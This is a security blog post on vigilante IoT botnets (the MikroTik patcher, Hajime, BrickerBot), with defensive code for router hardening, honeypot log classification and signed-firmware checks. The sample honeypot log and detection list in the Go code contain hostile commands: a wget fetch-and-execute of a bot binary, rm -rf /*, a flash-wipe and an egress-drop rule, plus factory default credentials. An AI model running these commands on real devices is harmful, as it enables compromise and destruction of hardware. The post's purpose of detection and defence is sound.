Based in Silicon Valley, California, Security Brief is a blog by Chris Louie. His posts discuss current information security affairs.

I AM THE CURE: Vigilante Botnets

In my freshman (first) year of college (university), I took an introductory course entitled “Ethics of Engineering”. The course was supposed to expose budding engineers to ethical dilemmas that had no right answer. For example, the Space Shuttle Columbia disaster was partially the result of reformulating the foam insulation on the shuttle’s external fuel tank to conform to US Environmental Protection Agency (EPA) standards on CFCs, a change that some argued weakened the foam and made it more prone to shedding. However, in an ironic twist, our professor told us in a braggadocious manner that he and his firm had defrauded the US Department of Defense by using sub-par materials to fulfil a contract for the US Navy. The ethics of any field (medicine, engineering, cyberwarfare, etc.) change as circumstances change, and a new generation of grey-hat hacker is emerging, bringing with it questions of ethics, morals, and the greater good.

Computer hacking is typically separated into two opposing groups: white hats and black hats. The distinction is an artifact of old Western movies, where the protagonists typically wore literal white hats and the antagonists literal black hats. White hat hackers specialize in penetration testing and other security research with good intentions and with permission from their targets to conduct the testing. On the opposite side of the spectrum, black hats attack systems without their owners’ permission, often illegally, and with malicious intent. Over time, a third category emerged: security researchers who access systems without authorization (black hat behaviour) but do so to expose dangerous vulnerabilities for the greater good and without personal gain (white hat motives). The term "grey hat" hacker was born. A hacker gaining unauthorized access to a charity’s computer network with the sole intention of informing them of an exposed vulnerability so they can patch it would be considered grey hat hacking. Sylvester Stallone famously delivered the line “You’re the disease and I’m the cure” before blowing away a hostage taker in the 1986 hit film Cobra, and that is the spirit in which the vigilantes below see themselves.

Vulnerable IoT devices pose a serious problem to the internet at large because they become the infrastructure used to bring down companies or large sections of the internet. The following are examples of grey hat hackers creating vigilante botnets designed to protect the internet (the cure).

@router_os

Over the last few weeks, a Russian grey hat hacker has been patching vulnerable MikroTik routers. This past April, MikroTik released a patch for a critical vulnerability in the Winbox management service (CVE-2018-14847) that allowed outside attackers to read the router’s credential database and gain unauthorized access to any of the over two million MikroTik routers in use around the world. While MikroTik created and released a patch, routers do not update themselves, and cybercriminals took full advantage of this to begin planting malware on unpatched MikroTik routers. Payloads seen so far include cryptomining scripts injected into web traffic, DNS poisoning to redirect banking sites and steal credentials, TLS stripping for HTTP interception and injection, and remote access trojans (RATs). Considering MikroTik routers are most commonly used by consumers and small office / home office (SOHO) organizations, which lack IT departments and information security personnel, it is highly likely that most affected routers have not yet been updated to a version of the software that closes the vulnerability, and data from Shodan appears to support this.

A hacker who goes by the handle Alexey posted on a Russian blog site that he has been gaining unauthorized access to vulnerable MikroTik routers and changing their settings to prevent other attackers from getting in and deploying a malicious payload. He simply runs a script that adds basic firewall rules and blocks management access to the router from the outside, which is security best practice. At the time of writing, over 100,000 vulnerable routers had been modified this way. Despite Alexey’s good intentions, it is still illegal to access another person’s equipment without their consent. Alexey opened a Telegram channel, @router_os, to collect feedback, and so far it has been overwhelmingly negative.
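For an owner who would rather not wait for a stranger to do it, the hardening Alexey applies amounts to a short RouterOS terminal script. The one below is an added example for this post; it is neither Alexey’s script nor MikroTik’s own guidance. It assumes ether1 is the interface facing the Internet and that the LAN is MikroTik’s default 192.168.88.0/24; adjust both if your router is configured differently.

```routeros
# 1. Patch first. The firewall rules below only close the door; they do not
#    remove the vulnerability from the RouterOS binary.
/system package update
check-for-updates
install

# 2. Management services. A default RouterOS install leaves every one of
#    these reachable on every interface, which is what the attackers used.
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set api disabled=yes
set api-ssl disabled=yes
set ssh address=192.168.88.0/24
set www-ssl address=192.168.88.0/24
set winbox address=192.168.88.0/24

# 3. Drop unsolicited traffic arriving on the WAN side (assumption: ether1).
/interface list
add name=WAN
/interface list member
add interface=ether1 list=WAN
/ip firewall filter
add chain=input connection-state=established,related action=accept comment="keep existing sessions"
add chain=input connection-state=invalid action=drop
add chain=input protocol=icmp action=accept comment="ping is fine"
add chain=input in-interface-list=WAN action=drop comment="no management from the Internet"

# 4. Before trusting the box again, look for what a previous visitor left:
/user print                 # accounts you did not create
/system scheduler print     # scheduled scripts used for persistence
/system script print
/ip socks print             # SOCKS proxy quietly enabled
/ip proxy print             # web proxy used to inject scripts into pages
/ip dns static print        # poisoned DNS entries
/tool sniffer print         # packet sniffer streaming traffic off-box
```

Run it from a LAN-side session (or in Safe Mode) so that a typo in the address lists cannot lock you out, and put the filter rules ahead of any existing catch-all in the input chain, since RouterOS evaluates them in order. If step 4 turns up a scheduler entry or user you do not recognize, a clean netinstall is safer than deleting it, because the attacker had the admin credentials and could have changed anything.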

Hajime

The Hajime vigilante botnet was first observed in October 2016, the same month the Mirai botnet took down DNS provider Dyn and many of its customers including Netflix, Twitter and Amazon Web Services, and it drew wide attention in early 2017. Hajime spreads the same way Mirai does, using well-known weaknesses such as open telnet ports and hard-coded default credentials. Once a device is infected, Hajime closes those doors behind it, for instance by blocking the listening telnet port. Command and control traffic is handled over a peer-to-peer network, making an ISP takedown much more difficult. Unlike malicious botnets such as Mirai and Satori, Hajime lacks DDoS capabilities, attack tools, and persistence mechanisms. Simply rebooting the device erases all traces of Hajime, leaving it exposed again with listening telnet ports and hard-coded credentials. Roughly every ten minutes the bot prints a signed message to the device’s terminal from the “Hajime Author”, stating that it is “just a white hat, securing some systems”.

The Hajime botnet made a resurgence in the spring of 2018 when it was updated to scan for MikroTik routers on TCP port 8291 (the Winbox service) and add them to the botnet.

BrickerBot

Another strain of vigilante botnet was discovered in April 2017. Like Hajime, BrickerBot attacks vulnerable IoT devices using well-known vulnerabilities and hard-coded credentials. The author, who goes by the handle Janit0r, states that vulnerable IoT devices are a cancer on the internet. After watching Mirai take down the security blog Krebs on Security and Dyn in a seemingly indiscriminate fashion, Janit0r thought the IoT industry would have no choice but to respond with security solutions to stop future attacks. After seeing no movement from IoT device manufacturers, Janit0r took matters into his own hands and created BrickerBot. Janit0r viewed BrickerBot as chemotherapy for the cancer that is IoT: chemotherapy is a very harsh treatment that no healthy person would volunteer for, but for cancer patients it is the lesser of two evils. He believed that millions of vulnerable and infected IoT devices were making the internet seriously ill and that moderate remedies (such as Hajime) were ineffective. Once BrickerBot logs in to a device, it removes the default gateway, wipes the device with rm -rf /*, and limits the maximum number of kernel threads to one. The iptables firewall and NAT rules are flushed and a rule is added to drop all outgoing packets. Two security slang terms, older than the malware but popularized by it, describe the result:

  • PDoS: Persistent Denial of Service

  • Phlashing: the act of PDoSing a device
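Hajime and BrickerBot arrive the same way, over telnet with factory credentials, and differ only in what they run once logged in. The Go program below is an added example for this post (not code from the page or from either botnet) that classifies sessions in a telnet honeypot log: it flags credential stuffing with known IoT default pairs, as Mirai and Hajime do, and flags the BrickerBot-style destructive sequence described above (flash and filesystem wipe, kernel thread limit, default gateway removal, egress drop). The log format, session IDs, addresses and the default-credential list are all constructed for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// SampleLog is a constructed telnet honeypot log, not a real capture.
// One event per line: timestamp|session|source|event|detail. For login
// events the detail is user:password; for commands it is the command line.
const SampleLog = `2018-10-12T03:14:07Z|s1|203.0.113.9|login.failed|root:xc3511
2018-10-12T03:14:08Z|s1|203.0.113.9|login.failed|root:vizxv
2018-10-12T03:14:09Z|s1|203.0.113.9|login.failed|admin:admin
2018-10-12T03:14:10Z|s1|203.0.113.9|login.failed|root:888888
2018-10-12T03:14:11Z|s1|203.0.113.9|login.success|root:default
2018-10-12T03:14:13Z|s1|203.0.113.9|command|wget http://198.51.100.7/bins/bot.arm7 -O /tmp/.x; chmod +x /tmp/.x; /tmp/.x
2018-10-12T03:20:01Z|s2|198.51.100.23|login.success|admin:admin
2018-10-12T03:20:02Z|s2|198.51.100.23|command|busybox cat /dev/urandom >/dev/mtdblock0 &
2018-10-12T03:20:03Z|s2|198.51.100.23|command|rm -rf /*
2018-10-12T03:20:04Z|s2|198.51.100.23|command|sysctl -w kernel.threads-max=1
2018-10-12T03:20:05Z|s2|198.51.100.23|command|route del default
2018-10-12T03:20:06Z|s2|198.51.100.23|command|iptables -F; iptables -t nat -F; iptables -A OUTPUT -j DROP
2018-10-12T03:31:40Z|s3|192.0.2.44|login.success|admin:S3cure!pw
2018-10-12T03:31:41Z|s3|192.0.2.44|command|uptime
2018-10-12T03:40:00Z|s4|192.0.2.77|login.success|root:root
2018-10-12T03:40:01Z|s4|192.0.2.77|command|cat /proc/cpuinfo`

// Session collects what one source did in one telnet session.
type Session struct {
	ID, Src         string
	FailedLogins    int
	DefaultCredHits int      // login attempts using a known factory default pair
	Markers         []string // BrickerBot-style destructive commands observed
	Label           string
}

// Factory defaults of the kind Mirai and Hajime try (a short constructed list,
// not the botnets' actual dictionaries).
var defaultCreds = map[string]bool{
	"root:xc3511": true, "root:vizxv": true, "root:888888": true, "root:default": true,
	"root:root": true, "root:admin": true, "admin:admin": true, "admin:1234": true,
}

// Command fragments matching the destructive sequence described for BrickerBot.
var pdosMarkers = []struct{ name, needle string }{
	{"flash-wipe", "/dev/mtd"},
	{"fs-wipe", "rm -rf /*"},
	{"thread-limit", "kernel.threads-max=1"},
	{"gateway-removal", "route del default"},
	{"egress-drop", "iptables -A OUTPUT -j DROP"},
}

// Analyze parses the log and labels every session.
func Analyze(text string) map[string]*Session {
	sessions := map[string]*Session{}
	for _, line := range strings.Split(strings.TrimSpace(text), "\n") {
		f := strings.SplitN(line, "|", 5)
		if len(f) != 5 {
			continue // malformed line, skip it
		}
		id, src, event, detail := f[1], f[2], f[3], f[4]
		s := sessions[id]
		if s == nil {
			s = &Session{ID: id, Src: src}
			sessions[id] = s
		}
		switch event {
		case "login.failed", "login.success":
			if event == "login.failed" {
				s.FailedLogins++
			}
			if defaultCreds[detail] {
				s.DefaultCredHits++
			}
		case "command":
			for _, m := range pdosMarkers {
				if strings.Contains(detail, m.needle) {
					s.Markers = append(s.Markers, m.name)
				}
			}
		}
	}
	for _, s := range sessions {
		s.Label = classify(s)
	}
	return sessions
}

// classify orders the verdicts by cost: a destructive sequence first, then
// brute force, then a quiet login with a factory password. One destructive
// marker alone (an admin really running "route del default") is not enough.
func classify(s *Session) string {
	switch {
	case len(s.Markers) >= 2:
		return "pdos"
	case s.FailedLogins >= 3 || s.DefaultCredHits >= 3:
		return "credential-stuffing"
	case s.DefaultCredHits > 0:
		return "default-credential-login"
	default:
		return "benign"
	}
}

func main() {
	sessions := Analyze(SampleLog)
	for _, id := range []string{"s1", "s2", "s3", "s4"} {
		s := sessions[id]
		fmt.Printf("%s %-14s failed=%d default=%d markers=%v -> %s\n",
			s.ID, s.Src, s.FailedLogins, s.DefaultCredHits, s.Markers, s.Label)
	}
}
```

On the sample, s1 is the Mirai/Hajime pattern (four failed factory logins, then a download and execute), s2 is the BrickerBot pattern (a single factory login followed by all five destructive markers), s3 is an operator with a real password, and s4 is the in-between case worth an alert on its own: nothing destructive yet, but the device still answers to root:root.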

While there is no single solution to IoT security and grey hat hackers are taking matters into their own hands, there are solutions emerging that should greatly assist with the vulnerable device problem.  

IoT security solutions wish list:

  1. Devices manufactured without bugs or vulnerabilities

  2. Disable remote management access by default

  3. Top-down secure IoT platform

  4. Hard coded passwords must be unique per device

  5. Hard coded passwords that are not unique must be changed upon first use

  6. Auto-update devices by default

  7. Require digital signature for firmware and software updates

  8. Firewall rules to close unnecessary ports

  9. Web proxy to inspect traffic for malicious data, command and control traffic

  10. RFC3514 (the April 1st “evil bit”)
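Item 7 is the one that lets item 6 be safe: a device that auto-updates must be able to tell a vendor image from an attacker’s, and must refuse an old, validly signed image that reintroduces a known hole. The Go program below is an added example for this post (not any vendor’s update format) showing the minimum a verifier needs: a signed header carrying the version, an Ed25519 signature over header and payload, and a rollback check that runs only after the signature has passed. The image layout, magic string and error names are assumptions made for the example.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Assumed image layout (integers big endian):
//   magic "FWIM" | version uint32 | payload length uint32 | payload | Ed25519 signature
// The signature covers header and payload, so the version field cannot be
// changed without invalidating it.
var magic = []byte("FWIM")

const headerLen = 4 + 4 + 4

var (
	ErrFormat   = errors.New("firmware: malformed image")
	ErrSig      = errors.New("firmware: signature verification failed")
	ErrRollback = errors.New("firmware: image is not newer than the installed version")
)

// GenerateVendorKey makes the vendor's signing key pair. Only the public half
// is burned into devices; the private half never leaves the vendor.
func GenerateVendorKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// BuildImage is the vendor-side step: header, payload, then sign both.
func BuildImage(priv ed25519.PrivateKey, version uint32, payload []byte) []byte {
	hdr := make([]byte, headerLen)
	copy(hdr, magic)
	binary.BigEndian.PutUint32(hdr[4:], version)
	binary.BigEndian.PutUint32(hdr[8:], uint32(len(payload)))
	signed := append(hdr, payload...)
	return append(signed, ed25519.Sign(priv, signed)...)
}

// VerifyImage is the device-side step. It returns the payload only if the
// image parses, the signature checks out under the vendor key, and the
// version is strictly newer than the installed one.
func VerifyImage(pub ed25519.PublicKey, image []byte, installed uint32) (uint32, []byte, error) {
	if len(image) < headerLen+ed25519.SignatureSize || !bytes.Equal(image[:4], magic) {
		return 0, nil, ErrFormat
	}
	version := binary.BigEndian.Uint32(image[4:8])
	plen := binary.BigEndian.Uint32(image[8:12])
	// Length check in uint64 so a huge declared length cannot wrap on 32-bit devices.
	if uint64(len(image)) != uint64(headerLen)+uint64(plen)+uint64(ed25519.SignatureSize) {
		return 0, nil, ErrFormat
	}
	signed, sig := image[:headerLen+int(plen)], image[headerLen+int(plen):]
	if !ed25519.Verify(pub, signed, sig) {
		return 0, nil, ErrSig // verify before trusting any field, including version
	}
	if version <= installed {
		return version, nil, ErrRollback // signed, but downgrade or replay
	}
	return version, signed[headerLen:], nil
}

func main() {
	pub, priv := GenerateVendorKey()
	image := BuildImage(priv, 2, []byte("constructed firmware blob v2"))

	if v, _, err := VerifyImage(pub, image, 1); err == nil {
		fmt.Println("genuine image accepted, version", v)
	}
	tampered := append([]byte(nil), image...)
	tampered[headerLen] ^= 0x01 // flip one payload bit
	_, _, err := VerifyImage(pub, tampered, 1)
	fmt.Println("tampered image:", err)
	_, _, err = VerifyImage(pub, image, 2)
	fmt.Println("replaying an already-installed version:", err)
}
```

Two details carry the weight: the version lives inside the signed region, so an attacker cannot take a genuinely signed old image and bump its version to get past the rollback check; and the rollback check is only reached after the signature passes, so an unsigned image never gets to influence the device’s notion of the current version. A real device would also keep the installed version in storage the update process cannot overwrite on its own.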
